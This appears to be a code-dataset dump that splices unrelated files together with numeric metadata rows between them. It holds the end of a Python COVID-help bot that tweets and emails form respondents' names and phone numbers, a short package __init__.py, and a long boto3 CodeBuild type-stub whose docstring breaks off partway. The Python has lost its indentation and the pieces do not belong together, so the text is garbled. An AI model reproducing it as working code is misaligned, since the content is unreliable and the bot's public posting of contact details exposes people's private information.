# pywhatkit.sendwhatmsg('+91' + str(contact), message_content.format(name, contact, requirement, location, email, link), time_hour=curtime[3], time_min=curtime[4] + 1, browser='firefox')
logger.info('Message Sent')
# sending tweet
def tweeter(name, requirement, location, contact):
message = '''Name: {}
Requirement: {}
Location: {}
Contact: {}
#COVIDEmergency2021 #covid19 #covid19helperbot
'''
api.update_status(message.format(name, requirement, location, contact))
logger.info('Tweet Sent')
logger.info('Getting Tweet ID')
posts = api.user_timeline()
id = posts[0].id_str
global link
link = 'https://twitter.com/Covid19_helper/status/' + id
logger.info('Link Generated - ' + link)
def responseData(response):
# extracting data from the rows
name = response[1]
contact = response[2]
requirement = response[3]
location = response[4]
email = response[5]
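# process only rows that have not yet been tweeted: a completed row has
# 7 values (timestamp, five form fields, and the tweet link in column G)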
if len(response) != 7:
print(name, requirement, location)
tweeter(name, requirement, location, contact)
sheet.update('G' + str(i), link)
print('[+] tweeted')
mailer(name, contact, requirement, location, email, link)
# waiting 2 seconds
time.sleep(2)
# Finding Workbook to read from
sheet = client.open("User Details (Responses)").sheet1
logger.info('Successfully Opened Responses Worksheet')
# variable to keep check of rows
i = 2
# working on the responses
logger.info('Started Working on Responses')
while True:
try:
response = sheet.row_values(i)
print(response)
responseData(response)
i += 1
logger.info('Response taken')
except IndexError:
logger.info('No new data available')
logger.info('Halt for 60 seconds before retrying')
time.sleep(60)
| 34.202765 | 191 | 0.691188 | 902 | 7,422 | 5.621951 | 0.256098 | 0.043384 | 0.030369 | 0.041412 | 0.819759 | 0.805167 | 0.805167 | 0.796293 | 0.796293 | 0.796293 | 0 | 0.007422 | 0.201293 | 7,422 | 216 | 192 | 34.361111 | 0.848009 | 0.123821 | 0 | 0.748466 | 0 | 0.02454 | 0.348889 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.02454 | false | 0.02454 | 0.110429 | 0 | 0.134969 | 0.018405 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
383dbda9a9c5ca45afb04da1b45436d8e944c027 | 89 | py | Python | dca_models/__init__.py | vatsalag99/Deformable-Channel-Attention | d904135fd7be45331a16d9cb84e44f8e1ff5c07e | [
"MIT"
] | 1 | 2020-12-01T20:57:09.000Z | 2020-12-01T20:57:09.000Z | dca_models/__init__.py | vatsalag99/Deformable-Channel-Attention | d904135fd7be45331a16d9cb84e44f8e1ff5c07e | [
"MIT"
] | null | null | null | dca_models/__init__.py | vatsalag99/Deformable-Channel-Attention | d904135fd7be45331a16d9cb84e44f8e1ff5c07e | [
"MIT"
] | null | null | null | from .dca_resnet import *
from .dca_mobilenetv2 import *
from .dca_cifar_resnet import *
| 22.25 | 31 | 0.797753 | 13 | 89 | 5.153846 | 0.461538 | 0.313433 | 0.38806 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012987 | 0.134831 | 89 | 3 | 32 | 29.666667 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
38602661ac3848f1be8c31ecc4fbcb044cdbaf13 | 438,665 | py | Python | boto3_type_annotations_with_docs/boto3_type_annotations/codebuild/client.py | cowboygneox/boto3_type_annotations | 450dce1de4e066b939de7eac2ec560ed1a7ddaa2 | [
"MIT"
] | 119 | 2018-12-01T18:20:57.000Z | 2022-02-02T10:31:29.000Z | boto3_type_annotations_with_docs/boto3_type_annotations/codebuild/client.py | cowboygneox/boto3_type_annotations | 450dce1de4e066b939de7eac2ec560ed1a7ddaa2 | [
"MIT"
] | 15 | 2018-11-16T00:16:44.000Z | 2021-11-13T03:44:18.000Z | boto3_type_annotations_with_docs/boto3_type_annotations/codebuild/client.py | cowboygneox/boto3_type_annotations | 450dce1de4e066b939de7eac2ec560ed1a7ddaa2 | [
"MIT"
] | 11 | 2019-05-06T05:26:51.000Z | 2021-09-28T15:27:59.000Z | from typing import Optional
from botocore.client import BaseClient
from typing import Dict
from botocore.paginate import Paginator
from botocore.waiter import Waiter
from typing import Union
from typing import List
class Client(BaseClient):
def batch_delete_builds(self, ids: List) -> Dict:
"""
Deletes one or more builds.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codebuild-2016-10-06/BatchDeleteBuilds>`_
**Request Syntax**
::
response = client.batch_delete_builds(
ids=[
'string',
]
)
**Response Syntax**
::
{
'buildsDeleted': [
'string',
],
'buildsNotDeleted': [
{
'id': 'string',
'statusCode': 'string'
},
]
}
**Response Structure**
- *(dict) --*
- **buildsDeleted** *(list) --*
The IDs of the builds that were successfully deleted.
- *(string) --*
- **buildsNotDeleted** *(list) --*
Information about any builds that could not be successfully deleted.
- *(dict) --*
Information about a build that could not be successfully deleted.
- **id** *(string) --*
The ID of the build that could not be successfully deleted.
- **statusCode** *(string) --*
Additional information about the build that could not be successfully deleted.
:type ids: list
:param ids: **[REQUIRED]**
The IDs of the builds to delete.
- *(string) --*
:rtype: dict
:returns:
"""
pass
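# Hypothetical usage sketch (not part of the generated stubs; the build IDs
# below are placeholders):
#
#   import boto3
#   client = boto3.client('codebuild')
#   resp = client.batch_delete_builds(ids=['my-project:id-1', 'my-project:id-2'])
#   print(resp['buildsDeleted'], resp['buildsNotDeleted'])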
def batch_get_builds(self, ids: List) -> Dict:
"""
Gets information about builds.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codebuild-2016-10-06/BatchGetBuilds>`_
**Request Syntax**
::
response = client.batch_get_builds(
ids=[
'string',
]
)
**Response Syntax**
::
{
'builds': [
{
'id': 'string',
'arn': 'string',
'startTime': datetime(2015, 1, 1),
'endTime': datetime(2015, 1, 1),
'currentPhase': 'string',
'buildStatus': 'SUCCEEDED'|'FAILED'|'FAULT'|'TIMED_OUT'|'IN_PROGRESS'|'STOPPED',
'sourceVersion': 'string',
'resolvedSourceVersion': 'string',
'projectName': 'string',
'phases': [
{
'phaseType': 'SUBMITTED'|'QUEUED'|'PROVISIONING'|'DOWNLOAD_SOURCE'|'INSTALL'|'PRE_BUILD'|'BUILD'|'POST_BUILD'|'UPLOAD_ARTIFACTS'|'FINALIZING'|'COMPLETED',
'phaseStatus': 'SUCCEEDED'|'FAILED'|'FAULT'|'TIMED_OUT'|'IN_PROGRESS'|'STOPPED',
'startTime': datetime(2015, 1, 1),
'endTime': datetime(2015, 1, 1),
'durationInSeconds': 123,
'contexts': [
{
'statusCode': 'string',
'message': 'string'
},
]
},
],
'source': {
'type': 'CODECOMMIT'|'CODEPIPELINE'|'GITHUB'|'S3'|'BITBUCKET'|'GITHUB_ENTERPRISE'|'NO_SOURCE',
'location': 'string',
'gitCloneDepth': 123,
'gitSubmodulesConfig': {
'fetchSubmodules': True|False
},
'buildspec': 'string',
'auth': {
'type': 'OAUTH',
'resource': 'string'
},
'reportBuildStatus': True|False,
'insecureSsl': True|False,
'sourceIdentifier': 'string'
},
'secondarySources': [
{
'type': 'CODECOMMIT'|'CODEPIPELINE'|'GITHUB'|'S3'|'BITBUCKET'|'GITHUB_ENTERPRISE'|'NO_SOURCE',
'location': 'string',
'gitCloneDepth': 123,
'gitSubmodulesConfig': {
'fetchSubmodules': True|False
},
'buildspec': 'string',
'auth': {
'type': 'OAUTH',
'resource': 'string'
},
'reportBuildStatus': True|False,
'insecureSsl': True|False,
'sourceIdentifier': 'string'
},
],
'secondarySourceVersions': [
{
'sourceIdentifier': 'string',
'sourceVersion': 'string'
},
],
'artifacts': {
'location': 'string',
'sha256sum': 'string',
'md5sum': 'string',
'overrideArtifactName': True|False,
'encryptionDisabled': True|False,
'artifactIdentifier': 'string'
},
'secondaryArtifacts': [
{
'location': 'string',
'sha256sum': 'string',
'md5sum': 'string',
'overrideArtifactName': True|False,
'encryptionDisabled': True|False,
'artifactIdentifier': 'string'
},
],
'cache': {
'type': 'NO_CACHE'|'S3'|'LOCAL',
'location': 'string',
'modes': [
'LOCAL_DOCKER_LAYER_CACHE'|'LOCAL_SOURCE_CACHE'|'LOCAL_CUSTOM_CACHE',
]
},
'environment': {
'type': 'WINDOWS_CONTAINER'|'LINUX_CONTAINER',
'image': 'string',
'computeType': 'BUILD_GENERAL1_SMALL'|'BUILD_GENERAL1_MEDIUM'|'BUILD_GENERAL1_LARGE',
'environmentVariables': [
{
'name': 'string',
'value': 'string',
'type': 'PLAINTEXT'|'PARAMETER_STORE'
},
],
'privilegedMode': True|False,
'certificate': 'string',
'registryCredential': {
'credential': 'string',
'credentialProvider': 'SECRETS_MANAGER'
},
'imagePullCredentialsType': 'CODEBUILD'|'SERVICE_ROLE'
},
'serviceRole': 'string',
'logs': {
'groupName': 'string',
'streamName': 'string',
'deepLink': 'string',
's3DeepLink': 'string',
'cloudWatchLogs': {
'status': 'ENABLED'|'DISABLED',
'groupName': 'string',
'streamName': 'string'
},
's3Logs': {
'status': 'ENABLED'|'DISABLED',
'location': 'string',
'encryptionDisabled': True|False
}
},
'timeoutInMinutes': 123,
'queuedTimeoutInMinutes': 123,
'buildComplete': True|False,
'initiator': 'string',
'vpcConfig': {
'vpcId': 'string',
'subnets': [
'string',
],
'securityGroupIds': [
'string',
]
},
'networkInterface': {
'subnetId': 'string',
'networkInterfaceId': 'string'
},
'encryptionKey': 'string'
},
],
'buildsNotFound': [
'string',
]
}
**Response Structure**
- *(dict) --*
- **builds** *(list) --*
Information about the requested builds.
- *(dict) --*
Information about a build.
- **id** *(string) --*
The unique ID for the build.
- **arn** *(string) --*
The Amazon Resource Name (ARN) of the build.
- **startTime** *(datetime) --*
When the build process started, expressed in Unix time format.
- **endTime** *(datetime) --*
When the build process ended, expressed in Unix time format.
- **currentPhase** *(string) --*
The current build phase.
- **buildStatus** *(string) --*
The current status of the build. Valid values include:
* ``FAILED`` : The build failed.
* ``FAULT`` : The build faulted.
* ``IN_PROGRESS`` : The build is still in progress.
* ``STOPPED`` : The build stopped.
* ``SUCCEEDED`` : The build succeeded.
* ``TIMED_OUT`` : The build timed out.
- **sourceVersion** *(string) --*
Any version identifier for the version of the source code to be built.
- **resolvedSourceVersion** *(string) --*
An identifier for the version of this build's source code.
* For AWS CodeCommit, GitHub, GitHub Enterprise, and BitBucket, the commit ID.
* For AWS CodePipeline, the source revision provided by AWS CodePipeline.
* For Amazon Simple Storage Service (Amazon S3), this does not apply.
- **projectName** *(string) --*
The name of the AWS CodeBuild project.
- **phases** *(list) --*
Information about all previous build phases that are complete and information about any current build phase that is not yet complete.
- *(dict) --*
Information about a stage for a build.
- **phaseType** *(string) --*
The name of the build phase. Valid values include:
* ``BUILD`` : Core build activities typically occur in this build phase.
* ``COMPLETED`` : The build has been completed.
* ``DOWNLOAD_SOURCE`` : Source code is being downloaded in this build phase.
* ``FINALIZING`` : The build process is completing in this build phase.
* ``INSTALL`` : Installation activities typically occur in this build phase.
* ``POST_BUILD`` : Post-build activities typically occur in this build phase.
* ``PRE_BUILD`` : Pre-build activities typically occur in this build phase.
* ``PROVISIONING`` : The build environment is being set up.
* ``QUEUED`` : The build has been submitted and is queued behind other submitted builds.
* ``SUBMITTED`` : The build has been submitted.
* ``UPLOAD_ARTIFACTS`` : Build output artifacts are being uploaded to the output location.
- **phaseStatus** *(string) --*
The current status of the build phase. Valid values include:
* ``FAILED`` : The build phase failed.
* ``FAULT`` : The build phase faulted.
* ``IN_PROGRESS`` : The build phase is still in progress.
* ``QUEUED`` : The build has been submitted and is queued behind other submitted builds.
* ``STOPPED`` : The build phase stopped.
* ``SUCCEEDED`` : The build phase succeeded.
* ``TIMED_OUT`` : The build phase timed out.
- **startTime** *(datetime) --*
When the build phase started, expressed in Unix time format.
- **endTime** *(datetime) --*
When the build phase ended, expressed in Unix time format.
- **durationInSeconds** *(integer) --*
How long, in seconds, between the starting and ending times of the build's phase.
- **contexts** *(list) --*
Additional information about a build phase, especially to help troubleshoot a failed build.
- *(dict) --*
Additional information about a build phase that has an error. You can use this information for troubleshooting.
- **statusCode** *(string) --*
The status code for the context of the build phase.
- **message** *(string) --*
An explanation of the build phase's context. This might include a command ID and an exit code.
- **source** *(dict) --*
Information about the source code to be built.
- **type** *(string) --*
The type of repository that contains the source code to be built. Valid values include:
* ``BITBUCKET`` : The source code is in a Bitbucket repository.
* ``CODECOMMIT`` : The source code is in an AWS CodeCommit repository.
* ``CODEPIPELINE`` : The source code settings are specified in the source action of a pipeline in AWS CodePipeline.
* ``GITHUB`` : The source code is in a GitHub repository.
* ``NO_SOURCE`` : The project does not have input source code.
* ``S3`` : The source code is in an Amazon Simple Storage Service (Amazon S3) input bucket.
- **location** *(string) --*
Information about the location of the source code to be built. Valid values include:
* For source code settings that are specified in the source action of a pipeline in AWS CodePipeline, ``location`` should not be specified. If it is specified, AWS CodePipeline ignores it. This is because AWS CodePipeline uses the settings in a pipeline's source action instead of this value.
* For source code in an AWS CodeCommit repository, the HTTPS clone URL to the repository that contains the source code and the build spec (for example, ``https://git-codecommit.*region-ID* .amazonaws.com/v1/repos/*repo-name* `` ).
* For source code in an Amazon Simple Storage Service (Amazon S3) input bucket, one of the following.
* The path to the ZIP file that contains the source code (for example, `` *bucket-name* /*path* /*to* /*object-name* .zip`` ).
* The path to the folder that contains the source code (for example, `` *bucket-name* /*path* /*to* /*source-code* /*folder* /`` ).
* For source code in a GitHub repository, the HTTPS clone URL to the repository that contains the source and the build spec. You must connect your AWS account to your GitHub account. Use the AWS CodeBuild console to start creating a build project. When you use the console to connect (or reconnect) with GitHub, on the GitHub **Authorize application** page, for **Organization access** , choose **Request access** next to each repository you want to allow AWS CodeBuild to have access to, and then choose **Authorize application** . (After you have connected to your GitHub account, you do not need to finish creating the build project. You can leave the AWS CodeBuild console.) To instruct AWS CodeBuild to use this connection, in the ``source`` object, set the ``auth`` object's ``type`` value to ``OAUTH`` .
* For source code in a Bitbucket repository, the HTTPS clone URL to the repository that contains the source and the build spec. You must connect your AWS account to your Bitbucket account. Use the AWS CodeBuild console to start creating a build project. When you use the console to connect (or reconnect) with Bitbucket, on the Bitbucket **Confirm access to your account** page, choose **Grant access** . (After you have connected to your Bitbucket account, you do not need to finish creating the build project. You can leave the AWS CodeBuild console.) To instruct AWS CodeBuild to use this connection, in the ``source`` object, set the ``auth`` object's ``type`` value to ``OAUTH`` .
- **gitCloneDepth** *(integer) --*
Information about the Git clone depth for the build project.
- **gitSubmodulesConfig** *(dict) --*
Information about the Git submodules configuration for the build project.
- **fetchSubmodules** *(boolean) --*
Set to true to fetch Git submodules for your AWS CodeBuild build project.
- **buildspec** *(string) --*
The build spec declaration to use for the builds in this build project.
If this value is not specified, a build spec must be included along with the source code to be built.
- **auth** *(dict) --*
Information about the authorization settings for AWS CodeBuild to access the source code to be built.
This information is for the AWS CodeBuild console's use only. Your code should not get or set this information directly.
- **type** *(string) --*
.. note::
This data type is deprecated and is no longer accurate or used.
The authorization type to use. The only valid value is ``OAUTH`` , which represents the OAuth authorization type.
- **resource** *(string) --*
The resource value that applies to the specified authorization type.
- **reportBuildStatus** *(boolean) --*
Set to true to report the status of a build's start and finish to your source provider. This option is valid only when your source provider is GitHub, GitHub Enterprise, or Bitbucket. If this is set and you use a different source provider, an invalidInputException is thrown.
- **insecureSsl** *(boolean) --*
Enable this flag to ignore SSL warnings while connecting to the project source code.
- **sourceIdentifier** *(string) --*
An identifier for this project source.
- **secondarySources** *(list) --*
An array of ``ProjectSource`` objects.
- *(dict) --*
Information about the build input source code for the build project.
- **type** *(string) --*
The type of repository that contains the source code to be built. Valid values include:
* ``BITBUCKET`` : The source code is in a Bitbucket repository.
* ``CODECOMMIT`` : The source code is in an AWS CodeCommit repository.
* ``CODEPIPELINE`` : The source code settings are specified in the source action of a pipeline in AWS CodePipeline.
* ``GITHUB`` : The source code is in a GitHub repository.
* ``NO_SOURCE`` : The project does not have input source code.
* ``S3`` : The source code is in an Amazon Simple Storage Service (Amazon S3) input bucket.
- **location** *(string) --*
Information about the location of the source code to be built. Valid values include:
* For source code settings that are specified in the source action of a pipeline in AWS CodePipeline, ``location`` should not be specified. If it is specified, AWS CodePipeline ignores it. This is because AWS CodePipeline uses the settings in a pipeline's source action instead of this value.
* For source code in an AWS CodeCommit repository, the HTTPS clone URL to the repository that contains the source code and the build spec (for example, ``https://git-codecommit.*region-ID* .amazonaws.com/v1/repos/*repo-name* `` ).
* For source code in an Amazon Simple Storage Service (Amazon S3) input bucket, one of the following.
* The path to the ZIP file that contains the source code (for example, `` *bucket-name* /*path* /*to* /*object-name* .zip`` ).
* The path to the folder that contains the source code (for example, `` *bucket-name* /*path* /*to* /*source-code* /*folder* /`` ).
* For source code in a GitHub repository, the HTTPS clone URL to the repository that contains the source and the build spec. You must connect your AWS account to your GitHub account. Use the AWS CodeBuild console to start creating a build project. When you use the console to connect (or reconnect) with GitHub, on the GitHub **Authorize application** page, for **Organization access** , choose **Request access** next to each repository you want to allow AWS CodeBuild to have access to, and then choose **Authorize application** . (After you have connected to your GitHub account, you do not need to finish creating the build project. You can leave the AWS CodeBuild console.) To instruct AWS CodeBuild to use this connection, in the ``source`` object, set the ``auth`` object's ``type`` value to ``OAUTH`` .
* For source code in a Bitbucket repository, the HTTPS clone URL to the repository that contains the source and the build spec. You must connect your AWS account to your Bitbucket account. Use the AWS CodeBuild console to start creating a build project. When you use the console to connect (or reconnect) with Bitbucket, on the Bitbucket **Confirm access to your account** page, choose **Grant access** . (After you have connected to your Bitbucket account, you do not need to finish creating the build project. You can leave the AWS CodeBuild console.) To instruct AWS CodeBuild to use this connection, in the ``source`` object, set the ``auth`` object's ``type`` value to ``OAUTH`` .
- **gitCloneDepth** *(integer) --*
Information about the Git clone depth for the build project.
- **gitSubmodulesConfig** *(dict) --*
Information about the Git submodules configuration for the build project.
- **fetchSubmodules** *(boolean) --*
Set to true to fetch Git submodules for your AWS CodeBuild build project.
- **buildspec** *(string) --*
The build spec declaration to use for the builds in this build project.
If this value is not specified, a build spec must be included along with the source code to be built.
- **auth** *(dict) --*
Information about the authorization settings for AWS CodeBuild to access the source code to be built.
This information is for the AWS CodeBuild console's use only. Your code should not get or set this information directly.
- **type** *(string) --*
.. note::
This data type is deprecated and is no longer accurate or used.
The authorization type to use. The only valid value is ``OAUTH`` , which represents the OAuth authorization type.
- **resource** *(string) --*
The resource value that applies to the specified authorization type.
- **reportBuildStatus** *(boolean) --*
Set to true to report the status of a build's start and finish to your source provider. This option is valid only when your source provider is GitHub, GitHub Enterprise, or Bitbucket. If this is set and you use a different source provider, an invalidInputException is thrown.
- **insecureSsl** *(boolean) --*
Enable this flag to ignore SSL warnings while connecting to the project source code.
- **sourceIdentifier** *(string) --*
An identifier for this project source.
- **secondarySourceVersions** *(list) --*
An array of ``ProjectSourceVersion`` objects. Each ``ProjectSourceVersion`` must be one of:
* For AWS CodeCommit: the commit ID to use.
* For GitHub: the commit ID, pull request ID, branch name, or tag name that corresponds to the version of the source code you want to build. If a pull request ID is specified, it must use the format ``pr/pull-request-ID`` (for example, ``pr/25`` ). If a branch name is specified, the branch's HEAD commit ID is used. If not specified, the default branch's HEAD commit ID is used.
* For Bitbucket: the commit ID, branch name, or tag name that corresponds to the version of the source code you want to build. If a branch name is specified, the branch's HEAD commit ID is used. If not specified, the default branch's HEAD commit ID is used.
* For Amazon Simple Storage Service (Amazon S3): the version ID of the object that represents the build input ZIP file to use.
- *(dict) --*
A source identifier and its corresponding version.
- **sourceIdentifier** *(string) --*
An identifier for a source in the build project.
- **sourceVersion** *(string) --*
The source version for the corresponding source identifier. If specified, must be one of:
* For AWS CodeCommit: the commit ID to use.
* For GitHub: the commit ID, pull request ID, branch name, or tag name that corresponds to the version of the source code you want to build. If a pull request ID is specified, it must use the format ``pr/pull-request-ID`` (for example, ``pr/25`` ). If a branch name is specified, the branch's HEAD commit ID is used. If not specified, the default branch's HEAD commit ID is used.
* For Bitbucket: the commit ID, branch name, or tag name that corresponds to the version of the source code you want to build. If a branch name is specified, the branch's HEAD commit ID is used. If not specified, the default branch's HEAD commit ID is used.
* For Amazon Simple Storage Service (Amazon S3): the version ID of the object that represents the build input ZIP file to use.
- **artifacts** *(dict) --*
Information about the output artifacts for the build.
- **location** *(string) --*
Information about the location of the build artifacts.
- **sha256sum** *(string) --*
The SHA-256 hash of the build artifact.
You can use this hash along with a checksum tool to confirm file integrity and authenticity.
.. note::
This value is available only if the build project's ``packaging`` value is set to ``ZIP`` .
- **md5sum** *(string) --*
The MD5 hash of the build artifact.
You can use this hash along with a checksum tool to confirm file integrity and authenticity.
.. note::
This value is available only if the build project's ``packaging`` value is set to ``ZIP`` .
- **overrideArtifactName** *(boolean) --*
If this flag is set, a name specified in the build spec file overrides the artifact name. The name specified in a build spec file is calculated at build time and uses the Shell Command Language. For example, you can append a date and time to your artifact name so that it is always unique.
- **encryptionDisabled** *(boolean) --*
Information that tells you if encryption for build artifacts is disabled.
- **artifactIdentifier** *(string) --*
An identifier for this artifact definition.
- **secondaryArtifacts** *(list) --*
An array of ``ProjectArtifacts`` objects.
- *(dict) --*
Information about build output artifacts.
- **location** *(string) --*
Information about the location of the build artifacts.
- **sha256sum** *(string) --*
The SHA-256 hash of the build artifact.
You can use this hash along with a checksum tool to confirm file integrity and authenticity.
.. note::
This value is available only if the build project's ``packaging`` value is set to ``ZIP`` .
- **md5sum** *(string) --*
The MD5 hash of the build artifact.
You can use this hash along with a checksum tool to confirm file integrity and authenticity.
.. note::
This value is available only if the build project's ``packaging`` value is set to ``ZIP`` .
- **overrideArtifactName** *(boolean) --*
If this flag is set, a name specified in the build spec file overrides the artifact name. The name specified in a build spec file is calculated at build time and uses the Shell Command Language. For example, you can append a date and time to your artifact name so that it is always unique.
- **encryptionDisabled** *(boolean) --*
Information that tells you if encryption for build artifacts is disabled.
- **artifactIdentifier** *(string) --*
An identifier for this artifact definition.
- **cache** *(dict) --*
Information about the cache for the build.
- **type** *(string) --*
The type of cache used by the build project. Valid values include:
* ``NO_CACHE`` : The build project does not use any cache.
* ``S3`` : The build project reads and writes from and to S3.
* ``LOCAL`` : The build project stores a cache locally on a build host that is only available to that build host.
- **location** *(string) --*
Information about the cache location:
* ``NO_CACHE`` or ``LOCAL`` : This value is ignored.
* ``S3`` : This is the S3 bucket name/prefix.
- **modes** *(list) --*
If you use a ``LOCAL`` cache, the local cache mode. You can use one or more local cache modes at the same time.
* ``LOCAL_SOURCE_CACHE`` mode caches Git metadata for primary and secondary sources. After the cache is created, subsequent builds pull only the change between commits. This mode is a good choice for projects with a clean working directory and a source that is a large Git repository. If you choose this option and your project does not use a Git repository (GitHub, GitHub Enterprise, or Bitbucket), the option is ignored.
* ``LOCAL_DOCKER_LAYER_CACHE`` mode caches existing Docker layers. This mode is a good choice for projects that build or pull large Docker images. It can prevent the performance issues caused by pulling large Docker images down from the network.
.. note::
* You can use a Docker layer cache in the Linux environment only.
* The ``privileged`` flag must be set so that your project has the required Docker permissions.
* You should consider the security implications before you use a Docker layer cache.
* ``LOCAL_CUSTOM_CACHE`` mode caches directories you specify in the buildspec file. This mode is a good choice if your build scenario is not suited to either of the other two local cache modes. If you use a custom cache:
* Only directories can be specified for caching. You cannot specify individual files.
* Symlinks are used to reference cached directories.
* Cached directories are linked to your build before it downloads its project sources. Cached items are overridden if a source item has the same name. Directories are specified using cache paths in the buildspec file.
- *(string) --*
- **environment** *(dict) --*
Information about the build environment for this build.
- **type** *(string) --*
The type of build environment to use for related builds.
- **image** *(string) --*
The image tag or image digest that identifies the Docker image to use for this build project. Use the following formats:
* For an image tag: ``registry/repository:tag`` . For example, to specify an image with the tag "latest," use ``registry/repository:latest`` .
* For an image digest: ``registry/repository@digest`` . For example, to specify an image with the digest "sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf," use ``registry/repository@sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf`` .
- **computeType** *(string) --*
Information about the compute resources the build project uses. Available values include:
* ``BUILD_GENERAL1_SMALL`` : Use up to 3 GB memory and 2 vCPUs for builds.
* ``BUILD_GENERAL1_MEDIUM`` : Use up to 7 GB memory and 4 vCPUs for builds.
* ``BUILD_GENERAL1_LARGE`` : Use up to 15 GB memory and 8 vCPUs for builds.
- **environmentVariables** *(list) --*
A set of environment variables to make available to builds for this build project.
- *(dict) --*
Information about an environment variable for a build project or a build.
- **name** *(string) --*
The name or key of the environment variable.
- **value** *(string) --*
The value of the environment variable.
.. warning::
We strongly discourage the use of environment variables to store sensitive values, especially AWS secret key IDs and secret access keys. Environment variables can be displayed in plain text using the AWS CodeBuild console and the AWS Command Line Interface (AWS CLI).
- **type** *(string) --*
The type of environment variable. Valid values include:
* ``PARAMETER_STORE`` : An environment variable stored in Amazon EC2 Systems Manager Parameter Store.
* ``PLAINTEXT`` : An environment variable in plaintext format.
- **privilegedMode** *(boolean) --*
Enables running the Docker daemon inside a Docker container. Set to true only if the build project is used to build Docker images, and the specified build environment image is not provided by AWS CodeBuild with Docker support. Otherwise, all associated builds that attempt to interact with the Docker daemon fail. You must also start the Docker daemon so that builds can interact with it. One way to do this is to initialize the Docker daemon during the install phase of your build spec by running the following build commands. (Do not run these commands if the specified build environment image is provided by AWS CodeBuild with Docker support.)
If the operating system's base image is Ubuntu Linux:
``- nohup /usr/local/bin/dockerd --host=unix:///var/run/docker.sock --host=tcp://0.0.0.0:2375 --storage-driver=overlay& - timeout 15 sh -c "until docker info; do echo .; sleep 1; done"``
If the operating system's base image is Alpine Linux, add the ``-t`` argument to ``timeout`` :
``- nohup /usr/local/bin/dockerd --host=unix:///var/run/docker.sock --host=tcp://0.0.0.0:2375 --storage-driver=overlay& - timeout -t 15 sh -c "until docker info; do echo .; sleep 1; done"``
- **certificate** *(string) --*
The certificate to use with this build project.
- **registryCredential** *(dict) --*
The credentials for access to a private registry.
- **credential** *(string) --*
The Amazon Resource Name (ARN) or name of credentials created using AWS Secrets Manager.
.. note::
The ``credential`` can use the name of the credentials only if they exist in your current region.
- **credentialProvider** *(string) --*
The service that created the credentials to access a private Docker registry. The valid value, SECRETS_MANAGER, is for AWS Secrets Manager.
- **imagePullCredentialsType** *(string) --*
The type of credentials AWS CodeBuild uses to pull images in your build. There are two valid values:
* ``CODEBUILD`` specifies that AWS CodeBuild uses its own credentials. This requires that you modify your ECR repository policy to trust AWS CodeBuild's service principal.
* ``SERVICE_ROLE`` specifies that AWS CodeBuild uses your build project's service role.
When you use a cross-account or private registry image, you must use SERVICE_ROLE credentials. When you use an AWS CodeBuild curated image, you must use CODEBUILD credentials.
- **serviceRole** *(string) --*
The name of a service role used for this build.
- **logs** *(dict) --*
Information about the build's logs in Amazon CloudWatch Logs.
- **groupName** *(string) --*
The name of the Amazon CloudWatch Logs group for the build logs.
- **streamName** *(string) --*
The name of the Amazon CloudWatch Logs stream for the build logs.
- **deepLink** *(string) --*
The URL to an individual build log in Amazon CloudWatch Logs.
- **s3DeepLink** *(string) --*
The URL to a build log in an S3 bucket.
- **cloudWatchLogs** *(dict) --*
Information about Amazon CloudWatch Logs for a build project.
- **status** *(string) --*
The current status of the logs in Amazon CloudWatch Logs for a build project. Valid values are:
* ``ENABLED`` : Amazon CloudWatch Logs are enabled for this build project.
* ``DISABLED`` : Amazon CloudWatch Logs are not enabled for this build project.
- **groupName** *(string) --*
The group name of the logs in Amazon CloudWatch Logs. For more information, see `Working with Log Groups and Log Streams <https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/Working-with-log-groups-and-streams.html>`__ .
- **streamName** *(string) --*
The prefix of the stream name of the Amazon CloudWatch Logs. For more information, see `Working with Log Groups and Log Streams <https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/Working-with-log-groups-and-streams.html>`__ .
- **s3Logs** *(dict) --*
Information about S3 logs for a build project.
- **status** *(string) --*
The current status of the S3 build logs. Valid values are:
* ``ENABLED`` : S3 build logs are enabled for this build project.
* ``DISABLED`` : S3 build logs are not enabled for this build project.
- **location** *(string) --*
The ARN of an S3 bucket and the path prefix for S3 logs. If your Amazon S3 bucket name is ``my-bucket`` , and your path prefix is ``build-log`` , then acceptable formats are ``my-bucket/build-log`` or ``arn:aws:s3:::my-bucket/build-log`` .
- **encryptionDisabled** *(boolean) --*
Set to true if you do not want your S3 build log output encrypted. By default S3 build logs are encrypted.
- **timeoutInMinutes** *(integer) --*
How long, in minutes, for AWS CodeBuild to wait before timing out this build if it does not get marked as completed.
- **queuedTimeoutInMinutes** *(integer) --*
The number of minutes a build is allowed to be queued before it times out.
- **buildComplete** *(boolean) --*
Whether the build is complete. True if complete; otherwise, false.
- **initiator** *(string) --*
The entity that started the build. Valid values include:
* If AWS CodePipeline started the build, the pipeline's name (for example, ``codepipeline/my-demo-pipeline`` ).
* If an AWS Identity and Access Management (IAM) user started the build, the user's name (for example, ``MyUserName`` ).
* If the Jenkins plugin for AWS CodeBuild started the build, the string ``CodeBuild-Jenkins-Plugin`` .
- **vpcConfig** *(dict) --*
If your AWS CodeBuild project accesses resources in an Amazon VPC, you provide this parameter that identifies the VPC ID and the list of security group IDs and subnet IDs. The security groups and subnets must belong to the same VPC. You must provide at least one security group and one subnet ID.
- **vpcId** *(string) --*
The ID of the Amazon VPC.
